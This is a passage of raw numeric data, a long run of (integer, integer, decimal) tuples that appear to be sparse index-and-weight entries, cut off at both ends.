.79331),(111,30376,0.98),(111,30377,0.95669),(111,30385,0.81669),(114,30385,0.81669),(111,30386,0.98),(111,30391,0.91),(111,30392,1.00331),(111,30393,0.81669),(111,30394,0.98),(111,30395,0.88669),(111,30396,0.95669),(111,30405,1.00331),(111,30406,1.07331),(111,30409,1.72662),(111,30410,0.98),(111,30411,1.05),(111,30412,0.86331),(111,30413,0.95669),(111,30418,1.58662),(111,30419,0.98),(111,30420,1.02669),(111,30421,0.98),(111,31657,0.18669),(116,31657,0.18669),(113,31657,0.37338),(128,31657,0.37338),(111,31658,1.02669),(111,31659,1.12),(111,31660,0.28),(111,31661,1.07331),(111,31662,1.26),(111,31663,0.74662),(111,31664,1.00331),(111,31665,1.07331),(111,31666,1.09669),(111,31667,1.16669),(111,31668,0.14),(111,31669,1.19),(111,31670,1.26),(111,31671,0.28),(111,31672,1.09669),(111,31673,1.16669),(111,31674,0.28),(111,31675,0.88669),(111,31676,0.95669),(111,31677,0.23331),(111,31678,0.88669),(111,31679,1.09669),(121,31680,0.18669),(111,31680,0.56007),(111,31681,1.00331),(111,31682,1.05),(111,31683,0.86331),(111,31684,1.09669),(111,31685,1.02669),(111,31686,1.21331),(111,31687,0.42),(111,31688,1.07331),(111,31689,1.12),(111,31690,0.37331),(111,31691,0.98),(111,31692,1.16669),(111,31693,0.28),(111,31694,1.02669),(111,31695,1.23669),(111,31696,0.28),(111,31697,0.98),(111,31698,1.02669),(111,31699,0.84),(111,31700,0.91),(111,31701,0.81669),(111,31702,1.14331),(111,31703,0.32669),(111,31704,0.93331),(111,31705,1.21331),(111,31706,0.46669),(111,31707,1.14331),(111,31708,1.30669),(111,31709,0.23331),(111,31710,1.09669),(111,31711,1.35331),(111,31712,0.37331),(111,31713,0.93331),(111,31714,1.00331),(111,31715,1.00331),(111,31716,1.05),(111,31717,0.93331),(111,31718,1.14331),(111,31719,0.74662),(111,31720,1.05),(111,31721,1.37669),(111,31722,1.00331),(111,31723,1.23669),(111,31724,0.23331),(111,31725,0.93331),(111,31726,1.05),(111,31727,0.32669),(111,31728,0.91),(111,31729,1.00331),(111,31730,0.32669),(111,31731,1.05),(111,31732,1.21331),(111,31733,0.46662),(111,31734,0.86331),(111,31735,1.02669),(111,31736,0.91),(111,31737,1.14331),(111,31738,0.23331),(111,31739,0.95669),(111,31740,1.05),(111,31741,0.28),(111,31742,0.98),(111,31743,1.14331),(111,31744,0.42),(111,31745,1.14331),(111,31746,1.23669),(111,31747,0.88669),(111,31748,1.07331),(111,31749,0.84),(111,31750,1.02669),(111,31751,0.91),(111,31752,0.98),(114,31753,0.14),(111,31753,0.28),(111,31754,0.93331),(111,31755,1.00331),(111,31756,0.93331),(111,31757,0.98),(111,31758,0.46662),(111,31759,1.05),(111,31760,1.21331),(111,31761,0.88669),(111,31762,1.00331),(111,31763,0.45339),(111,31764,0.51331),(111,31765,1.02669),(111,31766,1.26),(111,31767,0.84),(111,31768,1.00331),(111,31769,1.07331),(111,31770,1.12),(111,31771,1.21331),(111,31772,0.93331),(111,31773,1.21331),(111,31774,0.93331),(111,31775,1.02669),(111,31776,0.81669),(111,31777,0.88669),(111,31778,0.65338),(111,31779,1.02669),(111,31780,1.16669),(111,31781,0.95669),(111,31782,1.16669),(111,31783,0.93331),(111,31784,1.00331),(111,31785,0.18669),(111,31786,0.84),(111,31787,0.93331),(111,31788,0.37331),(111,31789,1.12),(111,31790,1.16669),(111,31791,0.95669),(111,31792,1.23669),(111,31793,0.91),(111,31794,1.00331),(111,31795,1.00331),(111,31796,1.19),(111,31797,1.05),(111,31798,1.26),(111,31799,0.95669),(111,31800,1.05),(111,31801,0.23331),(111,31802,0.88669),(111,31803,0.95669),(111,31804,0.37331),(111,31805,0.98),(111,31806,1.05),(111,31807,0.56),(111,31808,1.02669),(111,31809,1.12),(111,31810,0.23331),(111,31811,0.88669),(111,31812,1.09669),(111,31813,0.88669),(111,31814,0.93331),(111,31815,0.60669),(111,31816,1.07331),(111,31817,1.14331),(111,31818,0.28),(111,31819,0.91),(111,31820,1.05),(111,31821,0.23331),(128,31821,1.39986),(113,31821,1.63317),(111,31822,0.86331),(111,31823,1.00331),(111,31824,0.28),(111,31825,1.00331),(111,31826,1.05),(111,31827,0.84),(111,31828,0.98),(111,31829,0.46662),(111,31830,0.93331),(111,31831,1.07331),(111,31832,1.00331),(111,31833,1.14331),(111,31834,0.23331),(111,31835,0.91),(111,31836,1.05),(111,31837,0.28),(111,31838,1.00331),(111,31839,1.05),(111,31840,0.56),(111,31841,1.07331),(111,31842,1.19),(111,31843,1.05),(111,31844,1.09669),(111,31845,0.60669),(111,31846,1.16669),(111,31847,1.35331),(111,31848,0.32669),(111,31849,0.93331),(111,31850,1.12),(111,31851,0.84),(111,31852,1.05),(111,31853,1.21331),(111,31854,1.23669),(111,31855,1.4),(111,31856,0.88669),(111,31857,1.07331),(111,31858,0.28),(111,31859,1.00331),(111,31860,1.05),(111,31861,0.46669),(111,31862,0.98),(111,31863,1.19),(111,31864,0.14),(111,31865,0.86331),(111,31866,1.05),(111,31867,0.14),(114,31867,0.14),(111,31868,1.05),(111,31869,1.21331),(111,31870,0.23331),(111,31871,1.16669),(111,31872,1.26),(111,31873,1.21331),(111,31874,1.4),(111,31875,1.12),(111,31876,1.30669),(111,31877,0.28),(111,31878,0.86331),(111,31879,1.02669),(111,31880,0.98),(111,31881,1.02669),(111,31882,0.37331),(111,31883,1.05),(111,31884,1.16669),(111,31885,0.42),(111,31886,0.98),(111,31887,1.05),(111,31888,0.37331),(111,31889,1.02669),(111,31890,1.23669),(112,32170,0.88669),(112,32171,1.02669),(112,32172,0.88669),(112,32173,1.05),(112,32174,0.93331),(112,32175,0.93331),(112,32176,1.00331),(112,32177,0.88669),(112,32178,1.05),(112,32179,0.81669),(112,32180,0.88669),(112,32181,0.86331),(112,32182,0.93331),(112,32183,0.88669),(125,32183,0.88669),(112,32184,1.05),(112,32185,0.98),(112,32186,1.16669),(112,32187,0.98),(112,32188,1.05),(112,32189,0.91),(112,32190,1.14331),(112,32191,0.95669),(112,32192,1.07331),(112,32193,0.86331),(112,32194,0.93331),(112,32195,0.88669),(112,32196,1.07331),(112,32197,0.84),(112,32198,0.93331),(112,32199,0.86331),(112,32200,0.98),(112,32201,0.88669),(112,32202,1.02669),(112,32203,0.95669),(112,32204,0.46662),(112,32205,0.88669),(112,32206,0.98),(112,32207,0.93331),(112,32208,1.05),(112,32209,0.93331),(112,32210,1.07331),(112,32211,0.93331),(112,32212,1.07331),(112,32213,0.42),(112,32214,1.00331),(112,32215,1.26),(112,32216,1.07331),(112,32217,0.91),(112,32218,1.12),(112,32219,0.88669),(112,32220,0.93331),(112,32221,0.93331),(112,32222,0.98),(112,32223,0.91),(112,32224,1.07331),(112,32225,0.98),(112,32226,1.07331),(112,32227,0.65338),(112,32228,1.05),(112,32229,1.16669),(112,32230,1.00331),(112,32231,1.16669),(112,32232,1.02669),(112,32233,1.19),(112,32234,0.32669),(112,32235,1.05),(112,32236,1.16669),(112,32237,0.42),(112,32238,1.00331),(112,32239,1.19),(112,32240,1.96),(112,32241,1.07331),(112,32242,1.07331),(112,32243,0.91),(112,32244,1.07331),(112,32245,0.91),(112,32246,1.00331),(112,32247,0.88669),(112,32248,1.05),(112,32249,0.88669),(112,32250,1.07331),(112,32251,0.0175),(117,32251,0.0175),(126,32251,0.0175),(112,32252,0.95669),(112,32253,1.14331),(112,32254,0.18669),(112,32255,0.98),(112,32256,1.09669),(112,32257,0.93331),(112,32258,1.02669),(112,32259,1.09669),(112,32260,0.81669),(112,32261,1.09669),(112,32262,0.28),(112,32263,0.91),(112,32264,0.95669),(112,32265,1.02669),(112,32266,1.23669),(112,32267,0.98007),(112,32268,1.12),(112,32269,1.33),(112,32270,1.16669),(112,32271,1.21331),(112,32272,1.09669),(112,32273,1.19),(112,32274,1.00331),(120,32274,2.00662),(112,32275,1.09669),(112,32276,0.93331),(112,32277,1.00331),(112,32278,0.86331),(112,32279,0.98),(112,32280,0.86331),(112,32281,0.95669),(112,32282,1.02669),(112,32283,1.19),(112,32284,0.95669),(112,32285,0.88669),(112,32286,1.07331),(112,32287,0.93331),(112,32288,1.02669),(112,32289,0.93331),(112,32290,1.12),(112,32291,1.02669),(112,32292,1.12),(112,32293,0.95669),(112,32294,1.19),(112,32295,0.88669),(112,32296,1.09669),(112,32297,0.98),(112,32298,0.86331),(112,32299,1.05),(112,32300,0.98),(112,32301,1.00331),(123,32301,1.00331),(112,32302,1.12),(123,32303,0.88669),(112,32303,1.77338),(112,32304,1.02669),(112,32305,1.07331),(112,32306,0.95669),(112,32307,1.05),(112,32308,0.88669),(112,32309,1.12),(112,32310,1.02669),(112,32311,1.05),(112,32312,0.95669),(112,32313,1.16669),(112,32314,0.88669),(112,32315,0.95669),(112,32316,0.91),(112,32317,0.93331),(112,32318,1.12),(112,32319,0.37331),(112,32320,1.05),(112,32321,1.14331),(112,32322,0.28),(118,32322,0.28),(112,32323,0.93331),(112,32324,1.12),(112,32325,0.84),(118,32325,0.84),(112,32326,1.05),(112,32327,0.88669),(112,32328,0.93331),(112,32329,0.65338),(112,32330,1.86662),(112,32331,1.05),(112,32332,1.02669),(112,32333,0.32669),(112,32334,1.00331),(112,32335,1.12),(112,32336,0.93331),(112,32337,0.84),(112,32338,0.98),(112,32339,0.93331),(112,32340,1.14331),(112,32341,0.95669),(112,32342,0.42),(112,32343,1.05),(112,32344,1.16669),(112,32345,1.02669),(112,32346,1.12),(112,32347,0.93331),(112,32348,1.02669),(112,33129,1.02669),(112,33130,1.14331),(112,33131,1.07331),(112,33132,1.21331),(112,33133,0.91),(112,33134,1.05),(112,33135,0.88669),(123,33135,0.88669),(112,33136,0.98),(112,33137,0.23331),(112,33138,0.95669),(112,33139,1.02669),(112,33140,0.28),(116,33140,0.28),(125,33140,0.28),(112,33141,0.88669),(112,33142,1.00331),(112,33143,0.95669),(112,33144,1.19),(112,33145,0.37331),(112,33146,1.02669),(112,33147,1.16669),(112,33148,1.00331),(112,33149,1.14331),(112,33150,0.23331),(125,33150,0.23331),(112,33151,0.88669),(125,33151,0.88669),(112,33152,1.12),(112,33153,0.93331),(112,33154,1.07331),(112,33155,0.86331),(112,33156,1.02669),(112,33157,0.84),(112,33158,0.91),(112,33159,0.95669),(112,33160,0.32669),(112,33161,1.02669),(112,33162,1.07331),(112,33163,0.93331),(112,33164,0.98),(112,33165,0.86331),(119,33165,0.86331),(123,33165,1.72662),(112,33166,1.07331),(112,33167,0.88669),(112,33168,1.09669),(112,33169,0.86331),(112,33170,1.00331),(112,33171,0.28),(112,33172,0.98),(112,33173,1.12),(112,33174,1.02669),(112,33175,1.26),(112,33176,1.02669),(112,33177,0.46662),(112,33178,0.86331),(112,33179,1.02669),(112,33180,0.93331),(112,33181,1.09669),(112,33182,0.95669),(112,33183,1.05),(112,33184,1.05),(112,33185,1.19),(112,33186,0.28),(112,33187,0.88669),(112,33188,1.05),(112,33189,0.37331),(112,33190,1.05),(112,33191,1.30669),(112,33192,2.66007),(112,33193,0.93331),(112,33194,2.00662),(112,33195,0.95669),(112,33196,1.16669),(112,33197,0.91),(112,33198,1.00331),(118,33199,0.28),(112,33199,0.56),(112,33200,1.82),(112,33201,2.19338),(112,33202,0.28),(112,33203,0.95669),(112,33204,1.00331),(112,33205,0.93331),(112,33206,1.09669),(112,33207,0.37331),(112,33208,0.98),(112,33209,1.07331),(112,33210,0.86331),(112,33211,1.02669),(112,33212,0.37331),(112,33213,1.00331),(112,33214,1.14331),(113,33485,0.77),(113,33486,0.86331),(113,33487,0.81669),(119,33487,0.81669),(125,33487,0.81669),(113,33488,0.93331),(113,33489,0.95669),(113,33490,1.16669),(113,33491,0.86331),(113,33492,0.98),(113,33493,0.91),(113,33494,1.00331),(113,33495,0.81669),(113,33496,0.93331),(113,33497,0.88669),(113,33498,1.09669),(113,33499,0.98),(113,33500,1.12),(113,33501,0.98),(113,33502,1.07331),(113,33503,0.86331),(113,33504,0.95669),(113,33505,0.88669),(113,33506,1.02669),(113,33507,1.02662),(113,33508,1.12),(113,33509,1.33),(113,33510,1.05),(113,33511,1.16669),(113,33512,1.12),(113,33513,1.19),(113,33514,0.95669),(113,33515,1.09669),(113,33516,0.98),(113,33517,1.07331),(113,33518,0.37331),(117,33518,0.37331),(118,33518,0.37331),(113,33519,1.00331),(113,33520,1.28331),(113,33521,0.95669),(113,33522,1.05),(113,33523,1.00331),(113,33524,1.14331),(113,33525,0.37331),(113,33526,1.00331),(113,33527,1.19),(113,33528,0.84),(113,33529,1.21331),(113,33530,1.82),(113,33531,2.14662),(113,33532,0.91),(113,33533,1.00331),(113,33534,0.95669),(113,33535,0.91),(113,33536,1.05),(113,33537,1.02669),(113,33538,0.86331),(113,33539,1.12),(113,33540,1.00331),(113,33541,1.12),(113,33542,0.18669),(113,33543,0.93331),(113,33544,1.09669),(113,33545,0.32669),(113,33546,1.00331),(113,33547,1.16669),(113,33548,1.05),(113,33549,0.88669),(113,33550,1.05),(113,33551,0.91),(113,33552,1.02669),(113,33553,0.98),(113,33554,1.09669),(113,33555,1.05),(113,33556,0.91),(113,33557,0.98),(113,33558,0.98),(113,33559,1.07331),(113,33560,0.88669),(113,33561,0.95669),(113,33562,0.93331),(120,33562,0.93331),(113,33563,1.12),(113,33564,1.05),(113,33565,0.88669),(113,33566,1.02669),(113,33567,1.02669),(113,33568,1.16669),(113,33569,1.05),(113,33570,1.14331),(113,33571,1.02669),(113,33572,1.19),(113,33573,0.98),(113,33574,1.00331),(113,33575,1.12),(113,33576,0.91),(113,33577,1.14331),(113,33578,1.02669),(113,33579,0.88669),(113,33580,1.00331),(113,33581,1.00331),(113,33582,1.09669),(113,33583,1.00331),(113,33584,1.12),(113,33585,0.42),(113,33586,1.02669),(113,33587,1.21331),(113,33588,1.82),(113,33589,2.05338),(113,33590,0.93331),(113,33591,1.14331),(113,33592,2.73),(113,33593,3.21993),(113,33594,0.91),(113,33595,1.00331),(113,33596,1.00331),(113,33597,0.93331),(113,33598,1.00331),(113,33599,0.84),(113,33600,0.88669),(113,33601,1.05),(113,33602,0.28),(113,33603,0.93331),(113,33604,1.14331),(113,33605,0.56),(113,33606,1.07331),(113,33607,1.33),(113,33608,0.86331),(113,33609,1.00331),(113,33610,1.07331),(113,33611,1.07331),(113,34628,0.91),(113,34629,1.05),(128,34630,0.91),(113,34630,1.82),(113,34631,1.12),(113,34632,1.07331),(128,34633,0.91),(113,34633,2.73),(113,34634,1.12),(113,34635,0.98),(113,34636,1.00331),(113,34637,0.88669),(113,34638,0.93331),(113,34639,0.86331),(128,34639,1.72662),(113,34640,1.00331),(128,34640,2.00662),(113,34641,0.91),(113,34642,1.07331),(113,34643,0.95669),(113,34644,1.02669),(113,34645,1.02669),(113,34646,1.14331),(117,34647,0.32669),(128,34647,0.65338),(113,34647,2.61352),(113,34648,1.16669),(113,34649,1.26),(113,34650,1.07331),(113,34651,1.28331),(113,34652,0.95669),(128,34652,0.95669),(113,34653,1.05),(128,34653,1.05),(113,34654,0.93331),(113,34655,1.02669),(113,34656,1.02669),(113,34657,1.14331),(113,34658,0.95669),(113,34659,1.16669),(113,34660,1.00331),(113,34661,1.12),(113,34662,1.00331),(113,34663,1.12),(128,34664,0.65338),(113,34664,0.98007),(113,34665,1.00331),(113,34666,1.12),(113,34667,1.00331),(128,34667,1.00331),(113,34668,1.21331),(113,34669,0.98),(113,34670,1.16669),(113,34671,0.46669),(113,34672,1.09669),(113,34673,1.16669),(113,34674,0.32669),(113,34675,0.93331),(113,34676,1.02669),(113,34677,0.93331),(113,34678,1.16669),(113,34679,0.98),(113,34680,1.16669),(113,34681,1.00331),(113,34682,1.14331),(113,34683,1.02669),(113,34684,1.12),(113,34685,1.00331),(113,34686,1.07331),(113,34687,0.28),(113,34688,1.07331),(113,34689,1.19),(114,34690,0.23331),(119,34690,0.23331),(128,34690,1.39986),(113,34690,1.63317),(113,34691,1.02669),(113,34692,1.09669),(113,34693,0.93331),(113,34694,1.02669),(113,34695,0.98),(113,34696,1.05),(113,34697,0.91),(128,34697,1.82),(113,34698,1.00331),(128,34698,1.00331),(113,34699,1.00331),(113,34700,1.14331),(113,34701,0.93331),(113,34702,1.02669),(113,34703,0.95669),(128,34703,1.91338),(113,34704,1.21331),(128,34705,2.24),(113,34705,5.04),(113,34706,0.93331),(113,34707,1.05),(113,34708,0.95669),(113,34709,1.09669),(128,34710,0.93331),(113,34710,8.39979),(113,34711,1.07331),(113,34712,1.05),(113,34713,6.16014),(113,34714,1.07331),(128,34714,1.07331),(113,34715,0.93331),(113,34716,1.00331),(113,34717,0.93331),(113,34718,1.05),(113,34719,1.00331),(113,34720,1.14331),(113,34721,1.00331),(128,34721,2.00662),(113,34722,1.09669),(113,34723,1.02669),(113,34724,1.09669),(113,34725,0.98),(113,34726,1.14331),(113,34727,1.07331),(113,34728,1.19),(128,34729,1.82),(113,34729,2.73),(128,34730,2.00662),(113,34730,3.00993),(113,34731,0.18669),(120,34731,0.18669),(126,34731,0.18669),(119,34731,0.37338),(113,34732,0.88669),(113,34733,1.05),(113,34734,0.84),(128,34734,1.12),(113,34735,1.77338),(113,34736,1.02669),(113,34737,1.05),(113,34738,0.93331),(128,34738,0.93331),(113,34739,1.05),(113,34740,0.37331),(113,34741,0.95669),(113,34742,1.12),(128,34743,1.4),(113,34743,1.96),(128,34744,0.93331),(113,34744,1.86662),(113,34745,1.02669),(128,34745,1.02669),(113,34746,1.07331),(113,34747,2.87007),(128,34747,2.87007),(113,34748,1.05),(113,34749,1.05),(113,34750,1.14331),(128,34751,1.00331),(113,34751,2.00662),(128,34752,1.09669),(113,34752,2.19338),(113,34753,0.98),(113,34754,1.05),(113,34755,0.32669),(113,34756,0.98),(113,34757,1.16669),(113,34758,0.84),(113,34759,0.93331),(113,34760,1.09669),(113,34761,0.95669),(113,34762,0.37338),(113,34763,1.05),(113,34764,0.91),(113,34765,1.05),(113,34766,0.28),(113,34767,0.91),(113,34768,1.05),(113,34769,0.18669),(113,34770,0.88669),(113,34771,0.95669),(113,34772,1.00331),(113,34773,1.12),(113,34774,0.98),(113,34775,1.05),(113,34776,1.77338),(113,34777,1.02669),(113,34778,1.02669),(113,34779,0.95669),(113,34780,1.02669),(113,34781,0.91),(113,34782,0.98),(113,34783,0.93331),(113,34784,1.05),(113,34785,1.05),(113,34786,1.21331),(113,34787,1.02669),(113,34788,1.16669),(113,34789,1.02669),(113,34790,1.14331),(117,34791,0.86331),(120,34791,0.86331),(113,34791,1.72662),(113,34792,1.02669),(113,34793,1.05),(113,34794,0.23331),(128,34794,0.23331),(113,34795,0.88669),(113,34796,1.05),(113,34797,0.42),(113,34798,1.02669),(113,34799,1.26),(113,34800,0.28),(113,34801,0.91),(113,34802,1.05),(128,34803,5.74014),(113,34803,6.69683),(113,34804,1.16669),(113,34805,1.07331),(113,34806,1.12),(113,34807,1.05),(128,34807,2.1),(113,34808,1.14331),(113,34809,1.07331),(113,34810,1.09669),(128,34810,2.19338),(113,34811,0.46662),(113,34812,0.88669),(113,34813,1.05),(113,34814,1.05),(113,34815,1.16669),(113,34816,0.46662),(113,34817,0.91),(113,34818,1.00331),(113,34819,0.95669),(113,34820,1.07331),(113,34821,0.28),(113,34822,0.93331),(113,34823,1.07331),(113,34824,1.02669),(113,34825,1.16669),(113,34826,0.95669),(113,34827,1.07331),(113,34828,1.63345),(113,34829,0.95669),(113,34830,1.07331),(113,34831,4.10676),(113,34832,1.12),(113,34833,2.24),(113,34834,1.12),(113,34835,0.46669),(113,34836,1.14331),(113,34837,1.23669),(113,34838,0.32669),(120,34838,0.32669),(113,34839,0.93331),(113,34840,1.05),(113,34841,0.42),(113,34842,1.07331),(113,34843,1.21331),(128,34844,1.11993),(113,34844,1.49324),(113,34845,0.98),(128,34845,0.98),(113,34846,1.07331),(128,34846,1.07331),(113,34847,1.00331),(113,34848,1.07331),(113,34849,1.00331),(113,34850,1.16669),(113,34851,1.02669),(113,34852,1.14331),(113,34853,0.51331),(128,34853,0.51331),(113,34854,1.05),(113,34855,1.23669),(114,35216,0.81669),(114,35217,1.02669),(114,35218,0.86331),(114,35219,1.00331),(114,35220,0.86331),(114,35221,0.91),(114,35222,0.37331),(114,35223,0.93331),(114,35224,1.19),(114,35225,0.42),(114,35226,1.05),(114,35227,1.23669),(114,35228,0.32669),(114,35229,0.95669),(114,35230,1.09669),(114,35231,0.46669),(114,35232,1.00331),(114,35233,1.21331),(114,35234,0.98),(114,35235,1.05),(114,35236,0.32669),(114,35237,0.93331),(114,35238,1.09669),(114,35239,0.88669),(114,35240,1.05),(114,35241,0.42),(114,35242,1.09669),(114,35243,1.23669),(114,35244,0.42),(114,35245,1.14331),(114,35246,1.33),(114,35247,1.14331),(114,35248,0.91),(114,35249,0.98),(114,35250,0.46669),(114,35251,1.02669),(114,35252,1.26),(114,35407,1.02669),(114,35412,0.98),(114,35413,1.09669),(114,35416,0.95669),(114,35417,1.05),(114,35424,0.95669),(114,35425,1.02669),(114,35426,0.98),(114,35427,1.05),(114,35793,0.23331),(114,35794,0.86331),(114,35795,1.02669),(114,35796,0.37331),(114,35797,1.02669),(114,35798,1.16669),(114,35799,0.42),(114,35800,1.09669),(114,35801,1.19),(114,35802,0.32669),(114,35803,1.02669),(114,35804,1.23669),(114,35805,0.37331),(114,35806,0.93331),(114,35807,1.16669),(114,35808,0.86331),(114,35809,1.00331),(114,35810,1.07331),(114,35811,1.12),(114,35812,0.23331),(114,35813,1.07331),(114,35814,1.12),(114,35815,0.23331),(114,35816,0.93331),(114,35817,1.12),(114,35818,0.42),(114,35819,0.98),(114,35820,1.14331),(114,35821,0.23331),(114,35822,0.88669),(114,35823,1.02669),(114,35824,0.28),(114,35825,0.91),(114,35826,1.05),(114,35827,0.18669),(114,35828,0.95669),(114,35829,1.28331),(114,35830,0.18669),(114,35831,1.00331),(114,35832,1.14331),(114,35833,0.7),(114,35834,1.21331),(114,35835,1.28331),(114,35836,1.14331),(114,35837,1.28331),(114,35838,0.65331),(114,35839,1.07331),(114,35840,1.12),(114,35841,0.37331),(114,35842,1.07331),(114,35843,1.23669),(114,35844,0.32669),(114,35845,0.95669),(114,35846,1.12),(114,35847,0.37331),(114,35848,1.09669),(114,35849,1.26),(114,35850,0.28),(114,35851,0.93331),(114,35852,1.07331),(114,35853,0.81669),(114,35854,0.93331),(114,35855,0.95669),(114,35856,1.16669),(126,35946,0.88669),(126,35947,0.95669),(117,35957,0.88669),(118,35965,0.88669),(118,35966,1.05),(120,36005,0.88669),(119,36024,0.79331),(118,36040,0.18669),(119,36040,0.18669),(125,36040,0.18669),(123,36040,0.37338),(119,36041,0.91),(123,36041,0.91),(119,36042,1.00331),(118,36692,0.18669),(126,36702,0.56),(116,37024,0.86331),(125,37024,0.86331),(116,37025,0.93331),(116,37026,0.95669),(116,37027,0.88669),(116,37028,0.91),(116,37029,0.98),(116,37030,0.95669),(116,37031,1.00331),(116,37032,1.23669),(116,37033,1.00331),(116,37034,1.26),(116,37035,1.02669),(116,37036,1.16669),(116,37037,0.46669),(116,37038,1.00331),(116,37039,1.07331),(116,37040,0.91),(116,37041,0.98),(116,37042,0.88669),(116,37043,1.07331),(116,37044,1.05),(116,37045,1.19),(116,37046,1.02669),(116,37047,1.09669),(116,37048,0.91),(116,37049,1.00331),(116,37050,0.88669),(116,37051,1.00331),(116,37052,0.88669),(116,37053,1.09669),(116,37054,0.86331),(116,37055,0.98),(116,37056,0.88669),(116,37057,0.98),(116,37058,0.93331),(116,37059,1.02669),(116,37060,1.09669),(116,37061,1.16669),(116,37062,1.00331),(116,37063,1.12),(116,37064,0.93331),(116,37065,1.02669),(116,37066,0.95669),(116,37067,1.26),(116,37068,1.12),(116,37069,0.51331),(116,37070,1.02669),(116,37071,1.21331),(116,37072,0.88669),(116,37073,1.00331),(116,37074,1.00331),(116,37075,1.07331),(116,37076,0.93331),(116,37077,1.07331),(116,37078,0.86331),(116,37079,0.93331),(116,37080,0.56),(116,37081,1.12),(116,37082,1.21331),(116,37083,0.98),(116,37084,1.07331),(116,37085,0.42),(118,37085,0.42),(116,37086,1.09669),(116,37087,1.21331),(116,37088,0.42),(125,37088,0.42),(116,37089,1.09669),(116,37090,1.23669),(116,37456,0.95669),(116,37457,1.14331),(116,37458,0.28),(128,37458,0.56),(116,37459,1.02669),(116,37460,1.19),(116,37461,1.02669),(116,37462,1.09669),(116,37463,1.05),(116,37464,1.12),(116,37465,1.02669),(116,37466,1.23669),(116,37467,0.93331),(116,37468,1.12),(116,37469,0.95669),(116,37470,1.14331),(116,37471,1.00331),(116,37472,0.60669),(116,37473,1.07331),(116,37474,1.16669),(116,37475,0.91),(116,37476,1.14331),(116,37477,0.86331),(116,37478,1.02669),(116,37479,1.05),(116,37480,1.14331),(116,37481,1.16669),(116,37482,1.23669),(116,37483,0.42),(116,37484,1.02669),(116,37485,1.09669),(116,37486,0.28),(116,37487,0.91),(116,37488,1.14331),(116,37489,0.37331),(116,37490,0.95669),(116,37491,1.05),(116,37492,0.28),(116,37493,0.93331),(116,37494,1.02669),(116,37495,0.98),(116,37496,0.28),(118,37496,0.28),(116,37497,0.93331),(116,37498,1.05),(116,37499,0.86331),(116,37500,1.00331),(116,37501,0.86331),(116,37502,0.98),(117,37675,1.82),(117,37676,1.16669),(117,37677,1.05),(117,37678,0.88669),(117,37679,1.00331),(117,37680,0.93331),(117,37681,1.05),(117,37682,0.84),(117,37683,0.95669),(117,37684,1.02669),(117,37685,0.95669),(117,37686,0.88669),(117,37687,1.07331),(117,37688,0.88669),(117,37689,1.12),(117,37690,0.86331),(119,37690,0.86331),(117,37691,1.00331),(119,37691,1.00331),(117,37692,1.68),(117,37693,1.91338),(117,37694,0.81669),(117,37695,0.93331),(117,37696,0.86331),(118,37696,0.86331),(117,37697,1.02669),(117,37698,0.86331),(117,37699,0.91),(117,37700,1.53993),(117,37701,1.05),(117,37702,1.28331),(117,37703,2.38),(117,37704,1.28331),(117,37705,1.26),(117,37706,0.51331),(117,37707,1.07331),(117,37708,1.14331),(117,37709,0.93331),(117,37710,1.02669),(117,37711,1.02669),(117,37712,1.19),(117,37713,0.09331),(117,37714,0.84),(117,37715,1.07331),(117,37716,0.86331),(117,37717,0.95669),(117,37718,1.00331),(117,37719,1.00331),(117,37720,1.19),(117,37721,1.05),(117,37722,1.28331),(117,37723,0.91),(117,37724,1.14331),(117,37725,1.12),(117,37726,0.32669),(117,37727,0.95669),(117,37728,1.19),(117,37729,0.91),(117,37730,0.98),(117,37731,0.88669),(117,37732,1.00331),(117,37733,0.91),(117,37734,0.95669),(117,37735,1.16669),(117,37736,0.93331),(117,37737,1.02669),(117,37738,0.91),(117,37739,1.05),(117,37740,0.98),(117,37741,1.05),(117,37742,1.00331),(117,37743,1.12),(117,37744,0.95669),(117,37745,1.14331),(117,37746,0.93331),(117,37747,1.19),(117,37748,0.86331),(117,37749,1.07331),(117,37750,0.88669),(117,37751,0.98),(117,37752,2.00662),(117,37753,1.14331),(117,37754,1.12),(117,37755,1.05),(117,37756,1.00331),(117,37757,0.98),(117,37758,1.16669),(117,37759,1.12),(117,37760,0.93331),(117,37761,1.02669),(117,37762,0.95669),(117,37763,1.12),(117,37764,0.95669),(117,37765,1.14331),(117,37766,0.84),(117,37767,0.91),(117,37768,1.09669),(117,37769,0.95669),(117,37770,1.09669),(117,37771,0.93331),(117,37772,1.05),(117,37773,0.93331),(117,37774,1.00331),(117,37775,0.95669),(117,37776,1.02669),(117,37777,0.93331),(117,37778,1.12),(117,37779,0.91),(117,37780,0.98),(117,37781,0.91),(117,37782,1.02669),(117,37783,0.28),(117,37784,0.95669),(117,37785,1.07331),(117,37786,0.28),(119,37786,0.28),(117,37787,0.95669),(117,37788,1.02669),(117,37789,1.02669),(117,37790,1.12),(117,37791,1.07331),(117,37792,1.14331),(117,37793,0.18669),(117,37794,0.91),(117,37795,0.98),(117,37796,0.98),(117,37797,1.05),(117,37798,0.93331),(118,37798,0.93331),(117,37799,1.02669),(118,37799,1.02669),(117,37800,0.93331),(117,37801,1.05),(117,37802,0.86331),(117,37803,1.02669),(117,37804,0.91),(117,37805,1.07331),(117,37806,0.18669),(117,37807,0.98),(117,37808,1.07331),(117,37809,0.93331),(117,37810,1.05),(117,37811,0.95669),(123,37811,0.95669),(117,37812,1.07331),(123,37812,1.07331),(117,37813,0.37331),(117,37814,0.95669),(117,37815,1.07331),(117,37816,1.02669),(117,37817,1.12),(117,37818,0.93331),(117,37819,1.07331),(117,37820,0.79331),(119,37820,0.79331),(117,37821,0.91),(117,37822,0.86331),(117,37823,0.93331),(117,37824,0.93331),(119,37824,0.93331),(117,37825,1.00331),(119,37825,1.00331),(117,37826,0.86331),(117,37827,1.02669),(117,37828,0.86331),(117,37829,0.98),(117,37830,0.84),(117,37831,0.98),(117,37832,0.51331),(117,37833,1.23669),(117,37834,1.33),(117,37835,1.11993),(117,37836,1.02669),(117,37837,1.21331),(117,37838,1.07331),(117,37839,1.35331),(117,37840,0.95669),(117,37841,1.19),(117,38676,0.14),(117,38677,0.88669),(117,38678,0.98),(117,38679,1.02669),(117,38680,1.07331),(117,38681,0.88669),(117,38682,1.02669),(117,38683,0.23331),(117,38684,0.93331),(117,38685,1.02669),(119,38686,0.28),(123,38686,0.28),(117,38686,0.56),(126,38686,1.12),(117,38687,1.05),(117,38688,1.12),(117,38689,1.07331),(117,38690,1.14331),(117,38691,0.32669),(117,38692,1.00331),(117,38693,1.21331),(117,38694,0.95669),(117,38695,0.32669),(117,38696,0.93331),(117,38697,0.98),(117,38698,0.98),(117,38699,1.07331),(117,38700,0.18669),(117,38701,0.86331),(117,38702,0.91),(117,38703,0.32669),(117,38704,1.05),(117,3870